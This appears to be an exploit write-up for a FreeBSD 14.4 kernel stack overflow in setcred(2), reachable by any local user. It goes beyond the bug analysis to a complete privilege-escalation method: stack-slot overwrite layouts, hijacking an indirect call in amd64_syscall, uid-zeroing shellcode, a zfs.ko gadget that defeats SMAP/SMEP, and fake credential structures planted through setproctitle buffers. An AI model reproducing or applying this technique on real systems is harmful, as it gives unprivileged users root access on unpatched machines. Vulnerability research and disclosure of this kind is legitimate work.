File: sys/kern/kern_prot.c
Function: kern_setcred_copyin_supp_groups()
Lines: 528-533
The function signature uses a double pointer for the
groups argument:
static int kern_setcred_copyin_supp_groups(struct setcred *const wcred, const u_int flags, gid_t *const smallgroups, gid_t **const groups)
Because groups has type gid_t **, the
expression sizeof(*groups) evaluates to
sizeof(gid_t *) == 8 on LP64, rather than the intended
sizeof(gid_t) == 4. This sizeof expression is used in
two places:
/* line 528-530: allocation */ *groups = wcred->sc_supp_groups_nb sc_supp_groups_nb + 1) * sizeof(*groups), M_TEMP, M_WAITOK); /* sizeof(*groups) == 8 */ /* line 532-533: copyin */ error = copyin(wcred->sc_supp_groups, *groups + 1, wcred->sc_supp_groups_nb * sizeof(*groups)); /* sizeof(*groups) == 8 */
The allocation on the heap path is 2× oversized, which is
safe. However, for the stack path (when
sc_supp_groups_nb < CRED_SMALLGROUPS_NB == 16),
*groups is set to smallgroups, a
gid_t[CRED_SMALLGROUPS_NB] array declared as a local
variable in the caller user_setcred():
gid_t smallgroups[CRED_SMALLGROUPS_NB]; /* 16 * 4 = 64 bytes */
The copyin destination is *groups + 1 == &smallgroups[1],
which leaves 15 * 4 == 60 bytes of usable space. The
copyin copies sc_supp_groups_nb * sizeof(*groups) ==
sc_supp_groups_nb * 8 bytes. With the maximum stack-path
value of sc_supp_groups_nb == 15:
Bytes written: 15 * 8 = 120
Buffer capacity: 15 * 4 = 60
Overflow: 60 bytes past the end of smallgroups[]
The overflow is written with fully attacker-controlled data from
user space (wcred->sc_supp_groups points to an
attacker-supplied buffer).
Trigger path and privilege-check ordering
The overflow happens in
kern_setcred_copyin_supp_groups(), which is called
from user_setcred() at line 604 -- before
the privilege check. The privilege check
(priv_check_cred(PRIV_CRED_SETCRED)) does not occur
until kern_setcred() is called at line 623, and within
that function at line 813. Any local user can trigger the
overflow by issuing:
setcred(SETCREDF_SUPP_GROUPS, &wcred, sizeof(wcred))
with wcred.sc_supp_groups_nb == 15 and
wcred.sc_supp_groups pointing to a
15 * 8 == 120-byte user-space buffer.
LPE technique (no SMAP, no SMEP)
The 60-byte overflow corrupts every callee-saved register slot in
user_setcred()'s prologue except saved RBP.
Compiler ordering on 14.4 GENERIC places the corruption window at
[rbp - 0x40 .. -0x05]:
buf[60..67] mac.m_buflen buf[68..75] mac.m_string buf[76..83] td pointer spill <- controls kern_setcred(td=...) buf[84..91] saved rbx buf[92..99] saved r12 <- propagates up the stack buf[100..107] saved r13 buf[108..115] saved r14 buf[116..119] low 32 bits of saved r15
The crucial observation is that sys_setcred()'s
prologue saves only rbp/r14/rbx -- it does
not save r12. The corrupted
r12 popped by user_setcred()'s
epilogue therefore propagates unchanged through
sys_setcred() up to amd64_syscall(),
which at +0x155 uses it as if it were the live
td_proc pointer:
ffffffff8105b6e5: mov rcx, [r12 + 0x3f8] ; r12 fully controlled ffffffff8105b6ed: mov rdi, rbx ; rdi = real curthread ffffffff8105b6f0: mov esi, eax ; esi = setcred retval ffffffff8105b6f2: call [rcx + 0xc8] ; INDIRECT CALL
This is a two-level indirect call entirely controlled by the
attacker: *(r12+0x3f8) supplies rcx, and
*(rcx+0xc8) is the call target.
Without SMAP, the kernel happily dereferences user-mode pointers, so both indirections can be satisfied by fake structures placed in user memory. Without SMEP, the indirect call may target user-space code.
The published no-SMAP exploit constructs a fake
struct sysentvec whose
sv_set_syscall_retval slot
(offset 0xc8) points to user-space shellcode.
The shellcode reads gs:[0] for the real curthread,
restores r12, then zeroes
cr_uid/cr_ruid/cr_svuid/cr_rgid/cr_svgid on the
real td_ucred and returns.
LPE technique (SMAP/SMEP, no info-leak)
The chain primitive at amd64_syscall+0x155 reaches
its target with rcx = K1 (an attacker-chosen 8-byte
value). If the target gadget writes rcx + 1 to
td->td_ucred, the current thread's credential
pointer is now set to any address we choose -- and if that
address happens to lie inside a kernel buffer we control (a
heap-resident pargs slab), the fake credential we
planted there immediately takes effect.
The gadget lives inside zfs.ko, in
ZSTD_initCStream_advanced:
push rbp; mov rbp, rsp push r15; push r14; push rbx sub rsp, 0x38 mov rbx, rdx mov r14, rsi mov r15, rdi ; r15 = arg1 = real_td (from chain) mov rax, [rip + __stack_chk_guard] mov [rbp - 0x20], rax ; canary spill xor eax, eax cmp dword ptr [rbp + 0x2c], 0 lea rdx, [rcx + 1] ; rdx = K1 + 1 cmovne rax, rdx test rcx, rcx mov dword ptr [rdi + 0x430], 0 cmovne rax, rdx ; rcx != 0 (always) -> rax = K1 + 1 mov qword ptr [rdi + 0x180], rax ; *** td->td_ucred = K1+1 ***
The two cmovne instructions both fire whenever
rcx != 0. The function continues with stores into
td+0x10..0x3c which corrupt
TAILQ_ENTRY scheduler-link fields with garbage drawn
from amd64_syscall's stack frame, then performs its
canary check and returns. Empirically the corruption is
survivable until the thread next reaches the scheduler.
Fake ucred placement (parent's pargs slab)
setproctitle(2) is exposed to unprivileged users; the
kernel allocates a 256-byte slot in the PARGS UMA zone and copies
up to 244 user bytes verbatim into the ar_args field.
The parent process's pargs slab P_base becomes our
fake_ucred:
slot offset field value +0x20 cr_ref 0x7fffffff (high; defeats crfree) +0x28 cr_users 0x7fffffff +0x2c cr_flags 0 +0x60 cr_uid 0 +0x64 cr_ruid 0 +0x68 cr_svuid 0 +0x6c cr_ngroups 1 +0x88 cr_prison &prison0 (real kernel symbol) +0xb0 cr_groups &prison0 (TRICK: see note) +0xb8 cr_agroups 1 +0xc7 call target ZSTD_initCStream_advanced
cr_groups trick: setting
cr_groups = &prison0 makes
cred->cr_groups[0] read the first 4 bytes of
struct prison, which is pr_id = 0 = wheel
gid. This lets the in-kernel
groupmember(0, cred) check inside the VFS chmod
path return 1 without a NULL dereference.
K1 placement (child's pargs slab)
The chain primitive reads K1 via
mov rcx, [r12 + 0x3f8]; we want
K1 = P_base - 1 so that K1+1 = P_base is
our fake ucred. We can't write P_base - 1 back into
the parent's slab (it already contains fake ucred fields), and we
can't use the td_name trick: UMA-heap addresses always have a NUL
byte at byte offset 4 of P_base - 1, which truncates
thr_set_name's strlcpy.
Solution: fork a CHILD process that does its own
setproctitle with the qword P_base - 1
placed at offset 0xd0 of its own pargs. The chain
then sets r12 = C_base + 0xd0 - 0x3f8, so that
[r12 + 0x3f8] = qword at (C_base + 0xd0) = K1.
The parent must not exit and must not setproctitle again before
the child triggers the chain -- otherwise pargs is freed and
P_base may be reused.
Self-resolving kernel symbols
The exploit resolves ZSTD_initCStream_advanced and
&prison0 at runtime through the unprivileged
kldnext(2)+kldsym(2) interface, so a
single binary is portable across the entire 14.4 patchset.
The kernel image itself contains a different ZSTD library with
incompatible struct offsets, so for the ZSTD lookup we skip
fileid=1 (kernel) and pick the symbol from a loaded
module (zfs.ko on a typical server).
Post-exploit
The thread has effective root for VFS operations. From here, installing persistence or spawning a privileged shell is a routine post-exploitation step.